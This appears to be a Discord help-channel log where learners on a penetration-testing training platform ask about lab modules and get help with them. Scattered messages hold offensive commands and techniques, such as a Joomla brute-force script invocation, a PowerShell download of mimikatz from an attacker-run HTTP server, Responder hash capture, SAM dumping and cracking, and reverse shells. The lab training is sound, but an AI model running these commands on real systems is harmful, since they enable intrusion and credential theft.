jolly jackal
fathom pendant
#

if you're gonna request help in here: you're gonna have to tell us the module and section name

#

otherwise we can't effectively figure out what you're trying to communicate

#

it somewhat bridges language barriers if we read the question you're stuck on

#

Academy modules are broken into sections; each section contains text and usually some questions

#

the questions will tell you what it wants and generally instruct you to Authenticate in some way/shape/form to a target with given or discovered credentials

#

if you're on the linux fundamentals module; and on the System Information section - there is a small bit that talks about SSH

#

it is HIGHLY advised to read the WHOLE section and module before trying to ask questions

#

as often what you just asked is covered

nova nest
#

@jolly jackal try somethin like this

MODULE: ATTACKING COMMON SERVICES
SECTION: RDP

Question: I'm experiencing difficulty connecting to the RDP service using xfreerdp. The connection seems to fail whenever I click on a single file. I've also attempted to use the web-pawn-box as an alternative, but unfortunately, the connection continues to fail. Is this behavior expected, or am I encountering an unusual issue?

fathom pendant
nova nest
#

btw. this is a legit question hahahah, is it expected behavior that the rdp connection failes? :-DDD

fathom pendant
#

but also it's just pwnbox not pawnbox

limber river
#

just provide link to the section + what you have done

keen turtle
#

Hi i was quite new here and to all of this but i hope someone could help me with the following problem?
I am trying out the Sequel in Tier 1.
I can ping the ip but nmap isn't returning anything when using nmap -sC -sV {target_ip} it just keeps endlessly running.
I have already tried to reconnect vpn and also reset the box but still no luck.

fathom pendant
nova nest
keen turtle
#

@nova nest thanks i'll try to see if that helps figuring out what is going on.

nova nest
fathom pendant
keen turtle
#

ah ok thanks

analog pewter
#

is there an option reset the progress of the module

cursive oriole
#

Hi in Password attacks - pass the hash (pth) - Academy

DC01 What does it represent according to my understanding it's mapped to an IP of the instance running Julio/David, is it correct!?

#

And MS01 is mapped to the administrator which we gain access via Hash

So while listing the dir \DC01\david

It's equivalent to \(ip-of-david)(share name)

Is this correct?!

next bronze
#

DC01/MS01 or whatever hostname represent an IP of a machine, it's not related to any specific user

#

a user might have certain rights on different machines but a machine is just that, it's not a user

#

DC stands for domain controller

mint lodge
#

i dont understand how to work with the vpm files and its driving me crazy(got it working)

zenith mango
#

Anyone else working through the Web Proxy module dislike ZAP as much as I do?

#

Burp is just more intuitive imo.

barren root
#

ZAP feels so discount it's not even funny.

#

Any hints for finding the upload location in Skill Asssesment - File Upload Attacks?

zenith mango
#

Haven't made it to the skills assessment yet. I just finished Zap Fuzzer. I found the right md5 hash, and then closed out zap and used burp repeater to get the flag lol.

#

lol you're talking about a different module

#

I'm an idiot dude, as I was.

short hare
#

On Attacking Enterprise Network
Web Enumeration & Exploitation
Question: Exploit the WordPress instance and find a flag in the web root. Submit the flag value as your answer (flag format: HTB{}).

I found the valid user name as password as per section explains, but when try to login say error 502

Can anyone help???

The section itself explains to do this way

fleet lark
#

i am a beginner to 'hacking'. where should i start

compact patrolBOT
barren root
maiden field
#

hello can I dm you about that I'm stuck on this one

maiden field
#

ok

next bronze
#

also, treat it as a mock test, don't ask for help unless you're really out of ideas

placid edge
#

anyone understand why i get this issue?

python3 joomla-brute.py -u http://IP/ -U users.txt -w tools/Hacker-Toolset/Wordlists/passwords/xato-net-10-million-passwords-100000.txt 
 
Repsonse: admin:123456
#

it gives me a false response saying its correct

silver niche
#

Hi everyone, I'm on Information Gathering - Web Edition, section Active Subdomain Enumeration. I am having issues with finding the number of A records. I can use dig and nslookup to generate the listing of subdomains and their respective IPs but the number I use to answer the question is incorrect. I was wondering if anyone could point me in the right direction, please?

mortal mural
#

learn OSI model

fathom pendant
mortal mural
#

then he might as well just start from begining and learn what OSi is

#

will get a better understanding

fathom pendant
#

Eh Protocols existed before OSI and OSI model is more about the layers than actual protocols

#

Just that certain things exist within a stack

mortal mural
#

i learned about all that , starting from OSi atleast . was giving advice from my pov

#

then i dived deeper , into other things

fathom pendant
#

¯_(ツ)_/¯

mortal mural
indigo locust
#

Hi everyone can someone please tell me what tool i can use to find a user and password for following:

Examine the third target and submit the contents of flag.txt in C:\Users\Administrator\Desktop\ as the answer. ```

I cant find a user and password by using crackmapexec, evil-winrm, and hydra by using the user and mutated passowrd list given in module. Any tip to navigate me in right direction?
signal laurel
#

Has anyone finished the injection attack skills assessment?

misty current
signal laurel
inland shoal
#

Btw is it normal to have lag when typing during ssh. Im from Asia

fickle sparrow
#

hello, what can I use for identify the hashing algorithm that is being use?

fathom pendant
fickle sparrow
#

it is from the bizzness machine

fathom pendant
#

This channel is for assistance with academy modules

fickle sparrow
#

THank you

cedar void
#

Good afternoon, when transferring the mimikatz file(that I downloaded using the git clone method) from attacking machine to MS01 internal ip address, it did not work. I guess it will not work since port 80 is not listed as a port for the MS01 ip address when I look at the results of the nmap scan for that IP address. I would have to try an alternative transfer method or something like smbserver (since 445 is is listed as a port when doing the nmap scan for that address).

python3 -m http.server 8080
powershell wget -Uri http://10.10.16.125:8080//usr/share/windows-resources/mimikatz/Win32/mimikatz.exe -OutFile mimikatz.exe

https://academy.hackthebox.com/module/143/section/1278

shadow sapphire
#

Guys

#

Is HTB supported on mobile too?

fathom pendant
#

No

#

I mean the website loads but the pwnbox is practically unuseable

fathom pendant
#

This is like the smb thing all over again with you

#

The python web server is hosted in the directory you launch it from

#

You literally had a similar issue need to be explained to you regarding SMB

paper hill
#

i'm once again feeling dumb trying to solve the "Guessable Answers" section of broken authentication module. it says to find a guessable question, but every question that comes up has millions of possible answers

fathom pendant
#

Think dumb

paper hill
#

i'm thinking as dumb as i can

fathom pendant
paper hill
#

:3

#

but also like there are -so- many colors and flavors of pizza and cities and catjam_cry

fathom pendant
paper hill
#

i even tried hawaiian

fathom pendant
#

Time for burp repeater?

paper hill
#

i'm already trying big word lists but not getting any hits

silver iris
#

Hey guys i just finished "Active Directory Enumeration & Attacks -Living Off the Land".
I found the User relatively quickly with the dsquery command ( ||"Betty Ross"|| ). Then i wanted to read the discribtion with net and other commands, but didnt find anything. In the end i loaded bloodhound and firegured out she was called ||"BRoss"||. What was the intended way of finding out the naming convention?

next bronze
paper hill
#

there aren't any that i've seen 😦

cedar void
zenith mango
fathom pendant
silver iris
next bronze
paper hill
#

there are thousands of colors

#

probably way more than that

next bronze
#

try the most common

zenith mango
#

Thats fair. There is definitely a way to do it with powershell. I'm pretty sure you have to have the activedirectory module loaded. I'd have to go back and read through my notes to be certain, but it can 100% be done with powershell.

fathom pendant
next bronze
#

the error is unable to connect to server isnt it, probably a networking/pivot issue

fathom pendant
#

You have the port: and the file location is where you started the http server

fathom pendant
#

That's only part of the issue

next bronze
#

ah lol

silver iris
paper hill
#

i'm trying 😔

fathom pendant
paper hill
#

i feel like i'm forgetting colors

next bronze
fathom pendant
zenith mango
#

I don't know how you folks rememebr who had what issue, when. lol. I lose track of everyone.

paper hill
#

blurple spleen

fathom pendant
#

Especially when I was one of the people that helped/explained

zenith mango
#

I'm thankful for folks having fundamental issues. I don't have to ask the questions 99% of the time. I just search until I find the nudges I need lol.

fathom pendant
#

¯_(ツ)_/¯

#

At some point you gotta go back and refresh yourself

timid pier
#

Can I make videos of machine resolutions that are no longer worth points and post them on YouTube?

round sable
#

Hi, in "BLIND SQL INJECTION skills assessment", I manage to capture Murat's NetNTLM hash on ||Responder|| by using ||simple Windows post exploitation||, but not by using the ||EXEC master..xp_dirtree command||. Is it the expected approach or should there be a working triggering sql ||EXEC|| command that I am missing ?

paper hill
#

ok i now have a list of 1150 different color names. hopefully one of them is right

fathom pendant
desert cypress
#

Hello, can I speak to someone about the Attacking Common Applications - Skills Assessment I module?
I found the flag but there is something I don't understand and I would like to understand it, if someone can DM me. It concerns the location of the famous file

zenith mango
#

Just ask

fathom pendant
desert cypress
zenith mango
#

wrap the spoilers with double |

fathom pendant
zenith mango
#

pfff

fathom pendant
#

And people have had their messages deleted for spoiling with those tags

paper hill
#

hm. i'm really surprised the answer isn't "Microsoft Edge Blue"

fathom pendant
#

Obfuscation is better than the spoiler tag

next bronze
#

nah it's apple space grey

paper hill
#

oh my god

#

i found it

#

thanks friendos, y'all are great. i wasn't thinking dumb enough

zenith mango
#

I see. Kind of goofy but whatever. If people want to spoil a box for themselves, thats kinda on them, but this isn't my show to run.

desert cypress
round sable
fathom pendant
#

I.e. J..d..e or j*.txt

fathom pendant
fathom pendant
#

It's not so much that they want to, but discord doesn't do much to warn you against clicking spoilers

#

So on your phone for example you can accidentally click it

zenith mango
#

Yeah thats fair. You'd kind of need to say hey, spoilers here for this machine at the very least.

desert cypress
#

to give a little detail without spoilers, I don't understand why the file doesn't have the same path on the app as on the machine, I don't know if that helps x) and why my fuzzing never worked.

fathom pendant
#

And there's no way to unhide it outside of changing tabs

desert cypress
#

and even with the right path fuzzing has never worked

#

I tested gobuster, feroxbuster fuff , nothing

fathom pendant
#

Also just depends on how the web app is configured

desert cypress
main schooner
#

Trying to do the "Credential Hunting in Windows" module but lazagne will not finish a single scan. It produces some results in cmd then closes the window abruptly. Have tried outputting the results to a file but that is fruitless too. Checked events on the system and doesnt seem to log anything either. Just need to know if this is normal and im looking for a work around or its an issue?
Because one of the hints says to use lazagne

spiral spoke
#

Hello! I'm, in the first section of XSS and I think that** there is an error in this lab**:

  1. It's not possible even write 'test' and show 'test' like in the example in the section
  2. About the XSS paylods, it doesn't work, I've tried these payloads but I haven't got success with none:
#

It doesn't show any kind of alert in the lab. And the question is:

To get the flag, use the same payload we used above, but change its JavaScript code to show the cookie instead of showing the url.

#

Idk if it's my mistake, but** it's supposed to work according to the module **

lusty thicket
gusty granite
#

Im doing ffuf web fuzzing skill assessment and need sanity check for the file extensions question. anyone around that can help? (so I can DM you to verify answers)

spiral spoke
# lusty thicket

But not on mine, nor in others that I have found in this channel (I have seen at least 6 that have had the same problem)

potent ermine
lusty thicket
#

but if that happens to be too complicated for you open the dev tab and view the cookie directly 😉

barren root
gusty granite
spiral spoke
lusty thicket
median gale
#

What am I doing wrong with cat ? Seems I can't open anything

lusty thicket
median gale
cobalt trench
#

Password Attack Lab Hard - These are the hashes I got from the ||SAM file||:

#

I don't know what to do with them because they are blank/null. Any tips?

fathom pendant
#

admin hashes are cool

cobalt trench
fathom pendant
#

hashcat is useful

#

just checked my notes: hashcat is def the next step

cobalt trench
#

I also tried all the other modules for NTLM

fathom pendant
fathom pendant
# cobalt trench

add --show to your command without the password list; it looks like you already cracked and didn't think about it

fathom pendant
#

it worked on my machine ¯_(ツ)_/¯

cobalt trench
#

isnt that an empty hash thoough?

limber river
#

i guess you need to pass te whole hash to hashcat like Adminstartor:xxx:xxxxxxx:xxxxxxxx

cobalt trench
half wolf
#

error is at the top, options under it

limber river
#

don't spoil on others

half wolf
#

sorry, should I delete? Not sure how to get help without posting those details

limber river
half wolf
#

Im in "attacking common applications" in the "attacking wordpress" module, I was able to upload code execution to the plugin, but now I am struggling to get an meterpreter shell

#

I dont get the error thats listed in the module but I set the options the same way it shows the example to

limber river
#

there's no need for meterpreter

crystal steeple
#

what tool did you use to extarct the SAM hashes?

cobalt trench
cobalt trench
crystal steeple
#

yep secretsdump should be able to give the right hashes

cobalt trench
#

Now I just need to figure out hashcat lol

main schooner
potent ermine
signal laurel
#

Can someone help me out with the skill assessment for Injection Attacks. Im having issues with my final payload

main schooner
gusty granite
#

Ive completed the ffuf web fuzzing || Attacking Web Applications with Ffuf module. if anyone ever wants a sanity check or a nudge with that feel free to DM

tranquil axle
main schooner
#

"all" running it from cmd, it starts gathering data and outputting it in cmd, then after about 8 seconds just closes

potent ermine
# main schooner "all" running it from cmd, it starts gathering data and outputting it in cmd, th...

Oh yeah I just remember an odd behavior, but it seems like the cmd spawned by lazagne would exit every time I moved away from it, whether it be clicking on my host machine or even in the target RDP session if I brought up the other cmd prompt and moved lazagne to the background it would exit. I found that when I let it run without putting anything on top it wouldn't exit it out automatically 🤔

fathom pendant
#

when I did the secretsdump it gave me a username for all associated users with the files

cobalt trench
limber river
nocturne flint
#

Doing module "Socat Redirection with a Reverse Shell" now....how do I transfer the payload to the Windows machine?
Do I need to upload it to the ubuntu machine and then from there get it to the Windows machine?

fathom pendant
limber river
fathom pendant
fathom pendant
#

i mean you can use a pivot to transfer

cedar void
#

is a file transfer possible from the ip address of an attacking machine to the internal address on a target machine?? I don't get any response back from my internal address when I ping my target or attacking ip address.

limber river
fathom pendant
#

but you still need an initial access vector

nocturne flint
#

scp to the ubuntu and then....

fathom pendant
#

well you should have some form of remote access to the windows target

#

from the Ubuntu Target

open mica
#

Quick question: How do I preven the pwnbox from resizing to a very small screen when I have the full screen tab and the lab tab open in my browser. Its really driving me nuts.....

cedar void
fathom pendant
#

it's just something you live with

#

it's how it draws the screen

fathom pendant
nocturne flint
# fathom pendant any method of your choice from the file transfer module

Maybe I am missing something here....
In order to get a file on the Windows machine, I first need to setup Dynamic Port Forwarding with SSH and SOCKS Tunneling. That gets me RDP access to the Windows machine from my attack box. From there I can open a web browser and connect back to my web server to get the payload.
Then I dismantle that SOCKS tunnel so that I can do a bind shell?

I think I am lost

open mica
fathom pendant
#

it's moreso assuming you have some access to this network; and need to further pivot on the domain

fathom pendant
fading matrix
#

Can someone please help me with question 2 in "Analyzing Evil With Sysmon & Event Logs?" I'm stuck I don't know what I'm doing wrong. Can someone please sort me out? Thank you!

steel gorge
#

The File Inclusion module's Skill Assessment is an apache start page. If this is intentional that's fine. But it's quite different than other skill assessments so I just wanted to confirm something isn't amiss. Ill just keep fuzzing anyway
Edit: no it isn't, I need to read more lol

steel gorge